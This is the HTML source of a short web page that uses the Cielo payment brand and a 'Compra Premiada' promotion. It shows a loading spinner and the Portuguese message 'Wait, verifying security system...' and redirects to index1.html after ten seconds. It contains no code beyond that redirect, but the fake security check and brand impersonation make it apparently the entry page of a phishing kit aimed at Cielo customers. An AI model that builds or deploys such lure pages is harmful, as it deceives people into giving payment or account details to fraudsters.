<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon" href="img/favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="refresh" content="10; url=index1.html">
<title>Cielo: Nada supera essa m&aacute;quina | Compra Premiada</title>
<link href="css/estilo.css" rel="stylesheet" type="text/css" />
</head>

<body>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div id="box">
<center>
  <p><img src="img/c_bg.png" border="0" alt="" class="lg" />
  </p>
  <p>&nbsp;</p>
  <p>&nbsp;</p>
  <p style="font:11px Tahoma, Geneva, sans-serif; font-weight:bold; text-shadow:0 1px 1px #FFF; color:#333;">Aguarde, verificando sistema de seguran�a...</p>
  <p style="font:12px Tahoma, Geneva, sans-serif;">&nbsp;</p>
  <p><img src="img/carregando.gif" border="0" alt="" /></p>
</center>
</div><!--box-->
</body>
</html>